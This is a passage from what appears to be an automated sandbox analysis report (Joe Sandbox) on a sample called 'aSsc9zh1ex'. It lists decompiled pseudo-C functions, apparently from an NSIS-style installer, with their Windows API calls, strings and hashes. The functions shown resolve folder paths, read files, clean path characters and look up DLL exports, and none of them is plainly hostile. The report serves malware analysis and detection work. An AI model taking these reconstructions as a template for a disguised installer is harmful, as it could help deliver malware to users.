                        							if(__eflags != 0) {
                        								 *_t108 = _t81;
                        								_t108 = _t108 + _t98;
                        								__eflags = _t108;
                        							} else {
                        								 *_t108 =  *_t105;
                        								_t108 = _t108 + _t98;
                        								_t105 = _t105 + _t98;
                        							}
                        							L42:
                        							_t82 =  *_t105;
                        							_a8 = _t82;
                        							if(_t82 != 0) {
                        								_t81 = _a8;
                        								continue;
                        							}
                        							goto L43;
                        						}
                        						_t84 =  *((intOrPtr*)(_t105 + 1));
                        						_t47 =  *_t105;
                        						_t48 = _t47 & 0x000000ff;
                        						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                        						_t85 = _t84 & 0x000000ff;
                        						_v28 = _t48 | 0x00008000;
                        						_t77 = 2;
                        						_v16 = _t85;
                        						_t105 = _t105 + _t77;
                        						_v24 = _t48;
                        						_v20 = _t85 | 0x00008000;
                        						if(_a8 != _t77) {
                        							__eflags = _a8 - 3;
                        							if(_a8 != 3) {
                        								__eflags = _a8 - 1;
                        								if(__eflags == 0) {
                        									__eflags = (_t48 | 0xffffffff) - _v12;
                        									E00406557(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                        								}
                        								L38:
                        								_t108 =  &(_t108[lstrlenW(_t108)]);
                        								_t45 = 0x7a6a00;
                        								goto L42;
                        							}
                        							_t78 = _v12;
                        							__eflags = _t78 - 0x1d;
                        							if(_t78 != 0x1d) {
                        								__eflags = (_t78 << 0xb) + 0x7a9000;
                        								E0040651A(_t108, (_t78 << 0xb) + 0x7a9000);
                        							} else {
                        								E00406461(_t108,  *0x7a8a68);
                        							}
                        							__eflags = _t78 + 0xffffffeb - 7;
                        							if(__eflags < 0) {
                        								L29:
                        								E004067A1(_t108);
                        							}
                        							goto L38;
                        						}
                        						if( *0x7a8ae4 != 0) {
                        							_t77 = 4;
                        						}
                        						_t121 = _t48;
                        						if(_t48 >= 0) {
                        							__eflags = _t48 - 0x25;
                        							if(_t48 != 0x25) {
                        								__eflags = _t48 - 0x24;
                        								if(_t48 == 0x24) {
                        									GetWindowsDirectoryW(_t108, 0x400);
                        									_t77 = 0;
                        								}
                        								while(1) {
                        									__eflags = _t77;
                        									if(_t77 == 0) {
                        										goto L26;
                        									}
                        									_t59 =  *0x7a8a64;
                        									_t77 = _t77 - 1;
                        									__eflags = _t59;
                        									if(_t59 == 0) {
                        										L22:
                        										_t61 = SHGetSpecialFolderLocation( *0x7a8a68,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                        										__eflags = _t61;
                        										if(_t61 != 0) {
                        											L24:
                        											 *_t108 =  *_t108 & 0x00000000;
                        											__eflags =  *_t108;
                        											continue;
                        										}
                        										__imp__SHGetPathFromIDListW(_v8, _t108);
                        										_a8 = _t61;
                        										__imp__CoTaskMemFree(_v8);
                        										__eflags = _a8;
                        										if(_a8 != 0) {
                        											goto L26;
                        										}
                        										goto L24;
                        									}
                        									_t63 =  *_t59( *0x7a8a68,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                        									__eflags = _t63;
                        									if(_t63 == 0) {
                        										goto L26;
                        									}
                        									goto L22;
                        								}
                        								goto L26;
                        							}
                        							GetSystemDirectoryW(_t108, 0x400);
                        							goto L26;
                        						} else {
                        							E004063E8( *0x7a8a98, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8a98 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                        							if( *_t108 != 0) {
                        								L27:
                        								if(_v16 == 0x1a) {
                        									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                        								}
                        								goto L29;
                        							}
                        							E00406557(_t77, _t105, _t108, _t108, _v16);
                        							L26:
                        							if( *_t108 == 0) {
                        								goto L29;
                        							}
                        							goto L27;
                        						}
                        					}
                        					goto L43;
                        				}
                        			}

                        APIs
                        • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406672
                        • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F28,?,004055B3,007A0F28,00000000,00000000,0079BD28,76F1EA30), ref: 00406685
                        • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066FC
                        • lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: Directory$SystemWindowslstrcatlstrlen
                        • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                        • API String ID: 4260037668-1230650788
                        • Opcode ID: da38963e672fb73e568923eb237ce0014ee8c8129af21826515d3029acbe5ea3
                        • Instruction ID: 9e459ffa4d797bbc81f49b8710fc234ac44c95668d32beb4df18aeb57a87e6f9
                        • Opcode Fuzzy Hash: da38963e672fb73e568923eb237ce0014ee8c8129af21826515d3029acbe5ea3
                        • Instruction Fuzzy Hash: E061D271900206AADF109F64DC40BAE37A5AF55318F22C13BE917B72D0DB7D8AA1CB5D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004044DD(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                        				struct tagLOGBRUSH _v16;
                        				long _t39;
                        				long _t41;
                        				void* _t44;
                        				signed char _t50;
                        				long* _t54;
                        
                        				if(_a4 + 0xfffffecd > 5) {
                        					L18:
                        					return 0;
                        				}
                        				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                        				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                        					goto L18;
                        				} else {
                        					_t50 = _t54[5];
                        					if((_t50 & 0xffffffe0) != 0) {
                        						goto L18;
                        					}
                        					_t39 =  *_t54;
                        					if((_t50 & 0x00000002) != 0) {
                        						_t39 = GetSysColor(_t39);
                        					}
                        					if((_t54[5] & 0x00000001) != 0) {
                        						SetTextColor(_a8, _t39);
                        					}
                        					SetBkMode(_a8, _t54[4]);
                        					_t41 = _t54[1];
                        					_v16.lbColor = _t41;
                        					if((_t54[5] & 0x00000008) != 0) {
                        						_t41 = GetSysColor(_t41);
                        						_v16.lbColor = _t41;
                        					}
                        					if((_t54[5] & 0x00000004) != 0) {
                        						SetBkColor(_a8, _t41);
                        					}
                        					if((_t54[5] & 0x00000010) != 0) {
                        						_v16.lbStyle = _t54[2];
                        						_t44 = _t54[3];
                        						if(_t44 != 0) {
                        							DeleteObject(_t44);
                        						}
                        						_t54[3] = CreateBrushIndirect( &_v16);
                        					}
                        					return _t54[3];
                        				}
                        			}










                        APIs
                        • GetWindowLongW.USER32(?,000000EB), ref: 004044FA
                        • GetSysColor.USER32(00000000), ref: 00404538
                        • SetTextColor.GDI32(?,00000000), ref: 00404544
                        • SetBkMode.GDI32(?,?), ref: 00404550
                        • GetSysColor.USER32(?), ref: 00404563
                        • SetBkColor.GDI32(?,?), ref: 00404573
                        • DeleteObject.GDI32(?), ref: 0040458D
                        • CreateBrushIndirect.GDI32(?), ref: 00404597
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                        • String ID:
                        • API String ID: 2320649405-0
                        • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                        • Instruction ID: 307f0adb03de418db05ce456a6e98ecd908ab5abab62206e0655cd74099b0a55
                        • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                        • Instruction Fuzzy Hash: 702197B1501708BFD7309F28DD08B5BBBF8AF80714B00852EEA92A22E1D738D914CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 87%
                        			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                        				intOrPtr _t65;
                        				intOrPtr _t66;
                        				intOrPtr _t72;
                        				void* _t76;
                        				void* _t79;
                        
                        				_t72 = __edx;
                        				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                        				_t65 = 2;
                        				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                        				_t66 = E00402D84(_t65);
                        				_t79 = _t66 - 1;
                        				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                        				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                        				if(_t79 < 0) {
                        					L36:
                        					 *0x7a8ae8 =  *0x7a8ae8 +  *(_t76 - 4);
                        				} else {
                        					__ecx = 0x3ff;
                        					if(__eax > 0x3ff) {
                        						 *(__ebp - 0x44) = 0x3ff;
                        					}
                        					if( *__edi == __bx) {
                        						L34:
                        						__ecx =  *(__ebp - 0xc);
                        						__eax =  *(__ebp - 8);
                        						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                        						if(_t79 == 0) {
                        							 *(_t76 - 4) = 1;
                        						}
                        						goto L36;
                        					} else {
                        						 *(__ebp - 0x38) = __ebx;
                        						 *(__ebp - 0x18) = E0040647A(__ecx, __edi);
                        						if( *(__ebp - 0x44) > __ebx) {
                        							do {
                        								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                        									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E004060EB( *(__ebp - 0x18), __ebx) >= 0) {
                        										__eax = __ebp - 0x50;
                        										if(E0040608D( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                        											goto L34;
                        										} else {
                        											goto L21;
                        										}
                        									} else {
                        										goto L34;
                        									}
                        								} else {
                        									__eax = __ebp - 0x40;
                        									_push(__ebx);
                        									_push(__ebp - 0x40);
                        									__eax = 2;
                        									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                        									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                        									if(__eax == 0) {
                        										goto L34;
                        									} else {
                        										__ecx =  *(__ebp - 0x40);
                        										if(__ecx == __ebx) {
                        											goto L34;
                        										} else {
                        											__ax =  *(__ebp + 0xa) & 0x000000ff;
                        											 *(__ebp - 0x4c) = __ecx;
                        											 *(__ebp - 0x50) = __eax;
                        											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                        												L28:
                        												__ax & 0x0000ffff = E00406461( *(__ebp - 0xc), __ax & 0x0000ffff);
                        											} else {
                        												__ebp - 0x50 = __ebp + 0xa;
                        												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                        													L21:
                        													__eax =  *(__ebp - 0x50);
                        												} else {
                        													__edi =  *(__ebp - 0x4c);
                        													__edi =  ~( *(__ebp - 0x4c));
                        													while(1) {
                        														_t22 = __ebp - 0x40;
                        														 *_t22 =  *(__ebp - 0x40) - 1;
                        														__eax = 0xfffd;
                        														 *(__ebp - 0x50) = 0xfffd;
                        														if( *_t22 == 0) {
                        															goto L22;
                        														}
                        														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                        														__edi = __edi + 1;
                        														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                        														__eax = __ebp + 0xa;
                        														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                        															continue;
                        														} else {
                        															goto L21;
                        														}
                        														goto L22;
                        													}
                        												}
                        												L22:
                        												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                        													goto L28;
                        												} else {
                        													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                        														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                        															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                        															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                        														} else {
                        															__ecx =  *(__ebp - 0xc);
                        															__edx =  *(__ebp - 8);
                        															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                        															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                        														}
                        														goto L34;
                        													} else {
                        														__ecx =  *(__ebp - 0xc);
                        														__edx =  *(__ebp - 8);
                        														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                        														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                        														 *(__ebp - 0x38) = __eax;
                        														if(__ax == __bx) {
                        															goto L34;
                        														} else {
                        															goto L26;
                        														}
                        													}
                        												}
                        											}
                        										}
                        									}
                        								}
                        								goto L37;
                        								L26:
                        								__eax =  *(__ebp - 8);
                        							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                        						}
                        						goto L34;
                        					}
                        				}
                        				L37:
                        				return 0;
                        			}









                        APIs
                        • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                          • Part of subcall function 004060EB: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406101
                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: File$Pointer$ByteCharMultiWide$Read
                        • String ID: 9
                        • API String ID: 163830602-2366072709
                        • Opcode ID: 588ede5e84484d8860c92fb66ffae47e610f47b9ca95ac382e9d1b4b4742ae18
                        • Instruction ID: be08228a48e351455db253d3f5410474da148bca98ac48c4339161726040cff4
                        • Opcode Fuzzy Hash: 588ede5e84484d8860c92fb66ffae47e610f47b9ca95ac382e9d1b4b4742ae18
                        • Instruction Fuzzy Hash: 89510A75D00219AADF20EFD5CA88AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 85%
                        			E732D2480(void* __edx) {
                        				void* _t37;
                        				signed int _t38;
                        				void* _t39;
                        				void* _t41;
                        				signed char* _t42;
                        				signed char* _t51;
                        				void* _t52;
                        				void* _t54;
                        
                        				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                        				while(1) {
                        					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                        					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                        					_t52 = _t51[0x18];
                        					if(_t52 == 0) {
                        						goto L9;
                        					}
                        					_t41 = 0x1a;
                        					if(_t52 == _t41) {
                        						goto L9;
                        					}
                        					if(_t52 != 0xffffffff) {
                        						if(_t52 <= 0 || _t52 > 0x19) {
                        							_t51[0x18] = _t41;
                        							goto L12;
                        						} else {
                        							_t37 = E732D135A(_t52 - 1);
                        							L10:
                        							goto L11;
                        						}
                        					} else {
                        						_t37 = E732D12E3();
                        						L11:
                        						_t52 = _t37;
                        						L12:
                        						_t13 =  &(_t51[8]); // 0x1020
                        						_t42 = _t13;
                        						if(_t51[4] >= 0) {
                        						}
                        						_t38 =  *_t51 & 0x000000ff;
                        						_t51[0x1c] = 0;
                        						if(_t38 > 7) {
                        							L27:
                        							_t39 = GlobalFree(_t52);
                        							if( *(_t54 + 0x10) == 0) {
                        								return _t39;
                        							}
                        							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                        								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                        							} else {
                        								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                        							}
                        							continue;
                        						} else {
                        							switch( *((intOrPtr*)(_t38 * 4 +  &M732D25F8))) {
                        								case 0:
                        									 *_t42 = 0;
                        									goto L27;
                        								case 1:
                        									__eax = E732D13B1(__ebp);
                        									goto L21;
                        								case 2:
                        									 *__edi = E732D13B1(__ebp);
                        									__edi[1] = __edx;
                        									goto L27;
                        								case 3:
                        									__eax = GlobalAlloc(0x40,  *0x732d506c);
                        									 *(__esi + 0x1c) = __eax;
                        									__edx = 0;
                        									 *__edi = __eax;
                        									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x732d506c, __eax,  *0x732d506c, 0, 0);
                        									goto L27;
                        								case 4:
                        									__eax = E732D12CC(__ebp);
                        									 *(__esi + 0x1c) = __eax;
                        									L21:
                        									 *__edi = __eax;
                        									goto L27;
                        								case 5:
                        									__eax = GlobalAlloc(0x40, 0x10);
                        									_push(__eax);
                        									 *(__esi + 0x1c) = __eax;
                        									_push(__ebp);
                        									 *__edi = __eax;
                        									__imp__CLSIDFromString();
                        									goto L27;
                        								case 6:
                        									if( *__ebp != __cx) {
                        										__eax = E732D13B1(__ebp);
                        										 *__ebx = __eax;
                        									}
                        									goto L27;
                        								case 7:
                        									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                        									( *(__esi + 0x18) - 1) *  *0x732d506c =  *0x732d5074 + ( *(__esi + 0x18) - 1) *  *0x732d506c * 2 + 0x18;
                        									 *__ebx =  *0x732d5074 + ( *(__esi + 0x18) - 1) *  *0x732d506c * 2 + 0x18;
                        									asm("cdq");
                        									__eax = E732D1510(__edx,  *0x732d5074 + ( *(__esi + 0x18) - 1) *  *0x732d506c * 2 + 0x18, __edx,  *0x732d5074 + ( *(__esi + 0x18) - 1) *  *0x732d506c * 2);
                        									goto L27;
                        							}
                        						}
                        					}
                        					L9:
                        					_t37 = E732D12CC(0x732d5044);
                        					goto L10;
                        				}
                        			}












                        APIs
                        • GlobalFree.KERNEL32 ref: 732D25C2
                          • Part of subcall function 732D12CC: lstrcpynW.KERNEL32(00000000,?,732D137F,00000019,732D11CA,-000000A0), ref: 732D12DC
                        • GlobalAlloc.KERNEL32(00000040), ref: 732D2548
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 732D2563
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.886480223.00000000732D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 732D0000, based on PE: true
                        • Associated: 00000001.00000002.886476119.00000000732D0000.00000002.00000001.01000000.00000006.sdmp
                        • Associated: 00000001.00000002.886488080.00000000732D4000.00000002.00000001.01000000.00000006.sdmp
                        • Associated: 00000001.00000002.886506522.00000000732D6000.00000002.00000001.01000000.00000006.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_732d0000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                        • String ID: @hv
                        • API String ID: 4216380887-3217783804
                        • Opcode ID: 155b30b3751b97eb7c05e3092d4423e57a7cee9b81beca0f29e61fce0820cd8f
                        • Instruction ID: 1476978deacdfcd46d0fb692b6af124093fecadeed8701b11766d51506a2acd2
                        • Opcode Fuzzy Hash: 155b30b3751b97eb7c05e3092d4423e57a7cee9b81beca0f29e61fce0820cd8f
                        • Instruction Fuzzy Hash: 3741D1B1538309DFE758EF25E844F2677F8FB88311F10891DE84A86580EB74A5C4DB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E004067A1(WCHAR* _a4) {
                        				short _t5;
                        				short _t7;
                        				WCHAR* _t19;
                        				WCHAR* _t20;
                        				WCHAR* _t21;
                        
                        				_t20 = _a4;
                        				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                        					_t20 =  &(_t20[4]);
                        				}
                        				if( *_t20 != 0 && E00405E60(_t20) != 0) {
                        					_t20 =  &(_t20[2]);
                        				}
                        				_t5 =  *_t20;
                        				_t21 = _t20;
                        				_t19 = _t20;
                        				if(_t5 != 0) {
                        					do {
                        						if(_t5 > 0x1f &&  *((short*)(E00405E16(L"*?|<>/\":", _t5))) == 0) {
                        							E00405FC5(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                        							_t19 = CharNextW(_t19);
                        						}
                        						_t20 = CharNextW(_t20);
                        						_t5 =  *_t20;
                        					} while (_t5 != 0);
                        				}
                        				 *_t19 =  *_t19 & 0x00000000;
                        				while(1) {
                        					_push(_t19);
                        					_push(_t21);
                        					_t19 = CharPrevW();
                        					_t7 =  *_t19;
                        					if(_t7 != 0x20 && _t7 != 0x5c) {
                        						break;
                        					}
                        					 *_t19 =  *_t19 & 0x00000000;
                        					if(_t21 < _t19) {
                        						continue;
                        					}
                        					break;
                        				}
                        				return _t7;
                        			}









                        APIs
                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406804
                        • CharNextW.USER32(?,?,?,00000000,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406813
                        • CharNextW.USER32(?,00000000,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406818
                        • CharPrevW.USER32(?,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 0040682B
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: Char$Next$Prev
                        • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                        • API String ID: 589700163-826357637
                        • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                        • Instruction ID: df5be6298df38fe53a3c1647d4a953459580f705d81a6df7816dadf9acb4bb56
                        • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                        • Instruction Fuzzy Hash: C0110D2680161295DB3037149D84A7766F8EF58BA4F56803FED86732C0F77C4C9286BD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00404E31(struct HWND__* _a4, intOrPtr _a8) {
                        				long _v8;
                        				signed char _v12;
                        				unsigned int _v16;
                        				void* _v20;
                        				intOrPtr _v24;
                        				long _v56;
                        				void* _v60;
                        				long _t15;
                        				unsigned int _t19;
                        				signed int _t25;
                        				struct HWND__* _t28;
                        
                        				_t28 = _a4;
                        				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                        				if(_a8 == 0) {
                        					L4:
                        					_v56 = _t15;
                        					_v60 = 4;
                        					SendMessageW(_t28, 0x113e, 0,  &_v60);
                        					return _v24;
                        				}
                        				_t19 = GetMessagePos();
                        				_v16 = _t19 >> 0x10;
                        				_v20 = _t19;
                        				ScreenToClient(_t28,  &_v20);
                        				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                        				if((_v12 & 0x00000066) != 0) {
                        					_t15 = _v8;
                        					goto L4;
                        				}
                        				return _t25 | 0xffffffff;
                        			}















                        APIs
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E4C
                        • GetMessagePos.USER32 ref: 00404E54
                        • ScreenToClient.USER32 ref: 00404E6E
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E80
                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EA6
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: Message$Send$ClientScreen
                        • String ID: f
                        • API String ID: 41195575-1993550816
                        • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                        • Instruction ID: da5f2d6a974e9c572a85d9e94ff0a86548add23bfd296e24df18a92b611d7590
                        • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                        • Instruction Fuzzy Hash: 2F018C71900219BADB00DBA4DD81BFEBBBCAB94710F10002BBB10B61C0C7B4AA018BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E732D16BD(struct HINSTANCE__* _a4, short* _a8) {
                        				_Unknown_base(*)()* _t7;
                        				void* _t10;
                        				int _t14;
                        
                        				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                        				_t10 = GlobalAlloc(0x40, _t14);
                        				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                        				_t7 = GetProcAddress(_a4, _t10);
                        				GlobalFree(_t10);
                        				return _t7;
                        			}







                        APIs
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,732D22D8,?,00000808), ref: 732D16D5
                        • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,732D22D8,?,00000808), ref: 732D16DC
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,732D22D8,?,00000808), ref: 732D16F0
                        • GetProcAddress.KERNEL32(732D22D8,00000000), ref: 732D16F7
                        • GlobalFree.KERNEL32 ref: 732D1700
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.886480223.00000000732D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 732D0000, based on PE: true
                        • Associated: 00000001.00000002.886476119.00000000732D0000.00000002.00000001.01000000.00000006.sdmp
                        • Associated: 00000001.00000002.886488080.00000000732D4000.00000002.00000001.01000000.00000006.sdmp
                        • Associated: 00000001.00000002.886506522.00000000732D6000.00000002.00000001.01000000.00000006.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_732d0000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
